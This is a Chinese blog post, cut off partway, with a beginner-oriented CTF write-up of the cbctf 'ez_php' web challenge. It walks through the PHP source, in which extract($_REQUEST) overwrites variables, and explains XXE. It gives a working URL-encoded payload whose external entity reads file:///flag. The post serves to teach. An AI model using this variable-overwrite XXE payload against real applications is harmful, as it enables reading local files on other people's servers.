

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="e1vp4tic">
  <meta name="keywords" content="blog,e1vp4tic,cs">
  
    <meta name="description" content="今天开始做cbctf的web题，这个比赛说是新生赛，但实际上难度很大，很值得学习，所以写的详细些，把我做题时的全部心路历程都写出来。有的时候可能题解写到一半就突然开始解释基础知识，这是因为我自己做题的时候经常做到一半发现自己有东西不会，于是开始学习基础知识，这也是一个学习的过程。我不仅希望这个博客能教会新手ctf题的做法，更希望新手能学到做题时的思考过程，过程建立起来以后，当你遇到不会的题时就会自">
<meta property="og:type" content="article">
<meta property="og:title" content="cbctf">
<meta property="og:url" content="https://elvpatic.github.io/2025/09/26/cbctf/index.html">
<meta property="og:site_name" content="e1vp4tic&#39;s blog">
<meta property="og:description" content="今天开始做cbctf的web题，这个比赛说是新生赛，但实际上难度很大，很值得学习，所以写的详细些，把我做题时的全部心路历程都写出来。有的时候可能题解写到一半就突然开始解释基础知识，这是因为我自己做题的时候经常做到一半发现自己有东西不会，于是开始学习基础知识，这也是一个学习的过程。我不仅希望这个博客能教会新手ctf题的做法，更希望新手能学到做题时的思考过程，过程建立起来以后，当你遇到不会的题时就会自">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-09-26T05:13:41.000Z">
<meta property="article:modified_time" content="2025-09-27T14:58:29.209Z">
<meta property="article:author" content="e1vp4tic">
<meta property="article:tag" content="ctf-web">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>cbctf - e1vp4tic&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/mac.styl%20/css/indeximg-hover.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"elvpatic.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"Ir7RKiGS9zwhgtD416XsiDP6-gzGzoHsz","app_key":"1SAbfug15rHHsZTk8W9CUHLs","server_url":"https://ir7rkigs.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":true},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-11-03T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>e1vp4tic</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="cbctf"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-09-26 13:13" pubdate>
          2025年9月26日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          17 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">cbctf</h1>
            
            
              <div class="markdown-body">
                
                <p>今天开始做cbctf的web题，这个比赛说是新生赛，但实际上难度很大，很值得学习，所以写的详细些，把我做题时的全部心路历程都写出来。有的时候可能题解写到一半就突然开始解释基础知识，这是因为我自己做题的时候经常做到一半发现自己有东西不会，于是开始学习基础知识，这也是一个学习的过程。我不仅希望这个博客能教会新手ctf题的做法，更希望新手能学到做题时的思考过程，过程建立起来以后，当你遇到不会的题时就会自己去学习，去思考，等知识越学越多，就慢慢入门了。</p>
<h1 id="ez-php"><a href="#ez-php" class="headerlink" title="ez_php"></a>ez_php</h1><p>有难度，<del>或者说其实是我太菜</del>。一开始不确定附件能不能用，以为附件是用来本地搭建网站的，然后死活没有思路，于是尝试去网上找了找wp，发现连官方都是代码审计做的 ，于是自己打开分析了代码之后发现确实没有什么注入手段能够获取代码，如果不看源码的话是不可能解出来的一道题。</p>
<p>先来梳理网站的运行逻辑，即了解源码函数的运行顺序</p>
<p>打开容器，发现好像需要登陆，下方有跳转的注册链接，点进去之后注册成功，在返回登录界面，按照注册好的用户名和密码登录即可，此时就发现了运行顺序是</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs livescript">login.php--&gt;regitster.php<span class="hljs-function"><span class="hljs-params">(内部跳转<span class="hljs-keyword">function</span>.php)</span>--&gt;</span>login.php<br></code></pre></td></tr></table></figure>

<p>只要有一定的编程基础，理解代码不算难事，接下来开始阅读源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs php">register.php<br><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-keyword">include</span> <span class="hljs-string">&quot;utils/function.php&quot;</span>;<br>    <span class="hljs-variable">$config</span> = <span class="hljs-keyword">include</span> <span class="hljs-string">&quot;utils/config.php&quot;</span>;<br>    <span class="hljs-variable">$user_xml_format</span> = <span class="hljs-string">&quot;&lt;?xml version=&#x27;1.0&#x27;?&gt;</span><br><span class="hljs-string">                        &lt;userinfo&gt;</span><br><span class="hljs-string">                            &lt;user&gt;</span><br><span class="hljs-string">                                &lt;username&gt;%s&lt;/username&gt;</span><br><span class="hljs-string">                                &lt;password&gt;%s&lt;/password&gt;</span><br><span class="hljs-string">                            &lt;/user&gt;</span><br><span class="hljs-string">                        &lt;/userinfo&gt;&quot;</span>;<br>    <span class="hljs-title function_ invoke__">extract</span>(<span class="hljs-variable">$_REQUEST</span>);<br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$username</span>)||<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$password</span>)) <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Username or password cannot be empty XD&quot;</span>);<br><br>    <span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/^[a-zA-Z0-9_]+$/&#x27;</span>, <span class="hljs-variable">$username</span>)) <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Invalid username. :(&quot;</span>);<br><br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_user_exists</span>(<span class="hljs-variable">$username</span>, <span class="hljs-variable">$config</span>[<span class="hljs-string">&quot;user_info_dir&quot;</span>])) <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;User already exists XD&quot;</span>);<br>    <span class="hljs-variable">$user_xml</span> = <span class="hljs-title function_ invoke__">sprintf</span>(<span class="hljs-variable">$user_xml_format</span>, <span class="hljs-variable">$username</span>, <span class="hljs-variable">$password</span>);<br><br>    <span class="hljs-title function_ invoke__">register_user</span>(<span class="hljs-variable">$username</span>, <span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;user_info_dir&#x27;</span>], <span class="hljs-variable">$user_xml</span>);<br></code></pre></td></tr></table></figure>

<p>代码不长，直接丢给LLM分析，得到了安全警示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">extract</span>(<span class="hljs-variable">$_REQUEST</span>);<br></code></pre></td></tr></table></figure>

<p>这行代码会导致变量覆盖，他会读出REQUREST传进来的所有参数，并根据变量名写进源码中，改变源码设定好的一些格式和参数。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml">$user_xml_format = &quot;<span class="hljs-meta">&lt;?xml version=&#x27;1.0&#x27;?&gt;</span><br>                        <span class="hljs-tag">&lt;<span class="hljs-name">userinfo</span>&gt;</span><br>                            <span class="hljs-tag">&lt;<span class="hljs-name">user</span>&gt;</span><br>                                <span class="hljs-tag">&lt;<span class="hljs-name">username</span>&gt;</span>%s<span class="hljs-tag">&lt;/<span class="hljs-name">username</span>&gt;</span><br>                                <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span>%s<span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span><br>                            <span class="hljs-tag">&lt;/<span class="hljs-name">user</span>&gt;</span><br>                        <span class="hljs-tag">&lt;/<span class="hljs-name">userinfo</span>&gt;</span>&quot;;<br></code></pre></td></tr></table></figure>

<p>这行代码可以说很关键了，直接明确了漏洞类型—<strong>XXE注入</strong>，这是由xml语言带来的漏洞，参考链接会放在末尾。</p>
<p>xml是一种文档标记语言，用于标记数据之间的结构，而xml语言有一套自己的规范格式，称为<strong>DTD</strong></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">note</span> [&lt;!--定义此文档是 note 类型的文档--&gt;</span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ELEMENT <span class="hljs-keyword">note</span> (<span class="hljs-keyword">to</span>,<span class="hljs-keyword">from</span>,<span class="hljs-keyword">heading</span>,<span class="hljs-keyword">body</span>)&gt;</span>&lt;!--定义note元素有四个元素--&gt;</span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ELEMENT <span class="hljs-keyword">to</span> (<span class="hljs-keyword">#PCDATA</span>)&gt;</span>&lt;!--定义to元素为”#PCDATA”类型--&gt;</span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ELEMENT <span class="hljs-keyword">from</span> (<span class="hljs-keyword">#PCDATA</span>)&gt;</span>&lt;!--定义from元素为”#PCDATA”类型--&gt;</span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ELEMENT <span class="hljs-keyword">head</span> (<span class="hljs-keyword">#PCDATA</span>)&gt;</span>&lt;!--定义head元素为”#PCDATA”类型--&gt;</span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ELEMENT <span class="hljs-keyword">body</span> (<span class="hljs-keyword">#PCDATA</span>)&gt;</span>&lt;!--定义body元素为”#PCDATA”类型--&gt;</span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">note</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">to</span>&gt;</span>Y0u<span class="hljs-tag">&lt;/<span class="hljs-name">to</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">from</span>&gt;</span>@re<span class="hljs-tag">&lt;/<span class="hljs-name">from</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span>v3ry<span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span>g00d!<span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">note</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>如上是本地定义的DTD，还可以从外部引入DTD，但是一般情况下做题不会用到外部引入的DTD</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!DOCTYPE 根元素名称 <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;dtd路径&quot;</span>&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE 根元素 <span class="hljs-keyword">PUBLIC</span> <span class="hljs-string">&quot;DTD名称&quot;</span> <span class="hljs-string">&quot;DTD文档的URL&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>除此之外，xml还存在实体的概念，在解析下面这段代码时，**&amp;xxe<strong>就会被替换成</strong>file:&#x2F;&#x2F;&#x2F;flag** 来执行</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">test</span> [</span><br><span class="hljs-meta">        <span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">xxe</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///flag&quot;</span>&gt;</span></span><br><span class="hljs-meta">        ]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">userinfo</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">user</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">username</span>&gt;</span><span class="hljs-symbol">&amp;xxe;</span><span class="hljs-tag">&lt;/<span class="hljs-name">username</span>&gt;</span>  //用&amp;引导实体，<br>    <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span>123<span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">user</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">userinfo</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>解析xml在php库libxml，[simplexml_load_string()]可以读取XML</p>
<p>基础知识足够了，我们继续解题。</p>
<p>先验证xxe漏洞的存在，网页注册之后用Hackerbar插件load网页的链接，发现两个参数都是GET传参，这样我们就找到了注入点。继续代码审计找到我们需要上传的参数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">extract</span>(<span class="hljs-variable">$_REQUEST</span>);    <span class="hljs-comment">//接收来自任意形式传参的参数。</span><br><span class="hljs-variable">$config</span> = <span class="hljs-keyword">include</span> <span class="hljs-string">&quot;utils/config.php&quot;</span>;<br><span class="hljs-comment">//config.php</span><br><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-title function_ invoke__">libxml_disable_entity_loader</span>(<span class="hljs-literal">false</span>);<br>    <span class="hljs-keyword">return</span>  <span class="hljs-keyword">array</span>(<br>    <span class="hljs-string">&quot;user_info_dir&quot;</span> =&gt; <span class="hljs-string">&quot;./users&quot;</span>          <span class="hljs-comment">//相当于array[user_info_dir]=./user</span><br>    );<br><span class="hljs-title function_ invoke__">register_user</span>(<span class="hljs-variable">$username</span>, <span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;user_info_dir&#x27;</span>], <span class="hljs-variable">$user_xml</span>);<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">register_user</span>(<span class="hljs-params"><span class="hljs-variable">$username</span>, <span class="hljs-variable">$user_info_dir</span>, <span class="hljs-variable">$user_xml</span></span>)</span>&#123;<br>    <span class="hljs-variable">$user_dir_name</span> = <span class="hljs-variable">$user_info_dir</span>.<span class="hljs-string">&quot;/&quot;</span>.<span class="hljs-variable">$username</span>;       <span class="hljs-comment">//拼接字符串</span><br>    <span class="hljs-title function_ invoke__">mkdir</span>(<span class="hljs-variable">$user_dir_name</span>, <span class="hljs-number">0777</span>);                         <span class="hljs-comment">//建立文件夹</span><br>    <span class="hljs-comment">//把$user_xml的内容写进前一个参数（各种变量拼接成的网址</span><br>    <span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$user_dir_name</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$username</span>.<span class="hljs-string">&quot;.xml&quot;</span>, <span class="hljs-variable">$user_xml</span>);<br>    &#125;    <br></code></pre></td></tr></table></figure>

<p>这几行代码是我阅读时从不同文件中截取出来的，会生成一个username&#x2F;username.xml的网址，访问后回显$user_xml的内容。这里如果你更user.xml的内容，回显也有所不同，这里给了我思路，再加上对XXE漏洞的学习，我逐渐摸清了这道题。</p>
<p><strong>XXE攻击</strong>：应用程序解析XML输入时，没有禁止外部实体的加载，就会允许用户上传恶意外部实体和代码，从而实现包括但不限于文件读取，命令执行，DOS攻击等</p>
<p>通过阅读代码，我们也知道了注入点在register.php文件的<code> extract($_REQUEST);</code>，于是直接构造payload</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">/register.php?username<span class="hljs-operator">=</span>admin&amp;password<span class="hljs-operator">=</span>password&amp;user_xml<span class="hljs-operator">=</span>&amp;user_xml_format<span class="hljs-operator">=</span><span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%21</span><span class="hljs-variable">%44</span><span class="hljs-variable">%4</span>f<span class="hljs-variable">%43</span><span class="hljs-variable">%54</span><span class="hljs-variable">%59</span><span class="hljs-variable">%50</span><span class="hljs-variable">%45</span><span class="hljs-variable">%20</span><span class="hljs-variable">%74</span><span class="hljs-variable">%65</span><span class="hljs-variable">%73</span><span class="hljs-variable">%74</span><span class="hljs-variable">%20</span><span class="hljs-variable">%5</span>b<span class="hljs-variable">%0</span>a<span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%21</span><span class="hljs-variable">%45</span><span class="hljs-variable">%4</span>e<span class="hljs-variable">%54</span><span class="hljs-variable">%49</span><span class="hljs-variable">%54</span><span class="hljs-variable">%59</span><span class="hljs-variable">%20</span><span class="hljs-variable">%78</span><span class="hljs-variable">%78</span><span class="hljs-variable">%65</span><span class="hljs-variable">%20</span><span class="hljs-variable">%53</span><span class="hljs-variable">%59</span><span class="hljs-variable">%53</span><span class="hljs-variable">%54</span><span class="hljs-variable">%45</span><span class="hljs-variable">%4</span>d<span class="hljs-variable">%20</span><span class="hljs-variable">%22</span><span class="hljs-variable">%66</span><span class="hljs-variable">%69</span><span class="hljs-variable">%6</span><span class="hljs-keyword">c</span><span class="hljs-variable">%65</span><span class="hljs-variable">%3</span>a<span class="hljs-variable">%2</span>f<span class="hljs-variable">%2</span>f<span class="hljs-variable">%2</span>f<span class="hljs-variable">%66</span><span class="hljs-variable">%6</span><span class="hljs-keyword">c</span><span class="hljs-variable">%61</span><span class="hljs-variable">%67</span><span class="hljs-variable">%22</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%0</span>a<span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%5</span>d<span class="hljs-variable">%3</span>e<span class="hljs-variable">%0</span>a<span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%75</span><span class="hljs-variable">%73</span><span class="hljs-variable">%65</span><span class="hljs-variable">%72</span><span class="hljs-variable">%69</span><span class="hljs-variable">%6</span>e<span class="hljs-variable">%66</span><span class="hljs-variable">%6</span>f<span class="hljs-variable">%3</span>e<span class="hljs-variable">%0</span>a<span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%75</span><span class="hljs-variable">%73</span><span class="hljs-variable">%65</span><span class="hljs-variable">%72</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%0</span>a<span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%75</span><span class="hljs-variable">%73</span><span class="hljs-variable">%65</span><span class="hljs-variable">%72</span><span class="hljs-variable">%6</span>e<span class="hljs-variable">%61</span><span class="hljs-variable">%6</span>d<span class="hljs-variable">%65</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%26</span><span class="hljs-variable">%78</span><span class="hljs-variable">%78</span><span class="hljs-variable">%65</span><span class="hljs-variable">%3</span>b<span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%2</span>f<span class="hljs-variable">%75</span><span class="hljs-variable">%73</span><span class="hljs-variable">%65</span><span class="hljs-variable">%72</span><span class="hljs-variable">%6</span>e<span class="hljs-variable">%61</span><span class="hljs-variable">%6</span>d<span class="hljs-variable">%65</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%0</span>a<span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%20</span><span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%70</span><span class="hljs-variable">%61</span><span class="hljs-variable">%73</span><span class="hljs-variable">%73</span><span class="hljs-variable">%77</span><span class="hljs-variable">%6</span>f<span class="hljs-variable">%72</span><span class="hljs-variable">%64</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%31</span><span class="hljs-variable">%32</span><span class="hljs-variable">%33</span><span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%2</span>f<span class="hljs-variable">%70</span><span class="hljs-variable">%61</span><span class="hljs-variable">%73</span><span class="hljs-variable">%73</span><span class="hljs-variable">%77</span><span class="hljs-variable">%6</span>f<span class="hljs-variable">%72</span><span class="hljs-variable">%64</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%0</span>a<span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%2</span>f<span class="hljs-variable">%75</span><span class="hljs-variable">%73</span><span class="hljs-variable">%65</span><span class="hljs-variable">%72</span><span class="hljs-variable">%3</span>e<span class="hljs-variable">%0</span>a<span class="hljs-variable">%3</span><span class="hljs-keyword">c</span><span class="hljs-variable">%2</span>f<span class="hljs-variable">%75</span><span class="hljs-variable">%73</span><span class="hljs-variable">%65</span><span class="hljs-variable">%72</span><span class="hljs-variable">%69</span><span class="hljs-variable">%6</span>e<span class="hljs-variable">%66</span><span class="hljs-variable">%6</span>f<span class="hljs-variable">%3</span>e<br></code></pre></td></tr></table></figure>

<p>xml文件要用url编码，内容是</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">test</span> [</span><br><span class="hljs-meta">        <span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">xxe</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///flag&quot;</span>&gt;</span></span><br><span class="hljs-meta">        ]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">userinfo</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">user</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">username</span>&gt;</span><span class="hljs-symbol">&amp;xxe;</span><span class="hljs-tag">&lt;/<span class="hljs-name">username</span>&gt;</span>  //用&amp;引导实体，<br>    <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span>123<span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">user</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">userinfo</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里利用file:&#x2F;&#x2F;&#x2F;flag的写法直接读取flag，这时候可能会有两个问题：</p>
<ul>
<li><p>为什么flag就在这个目录下呢？</p>
<ul>
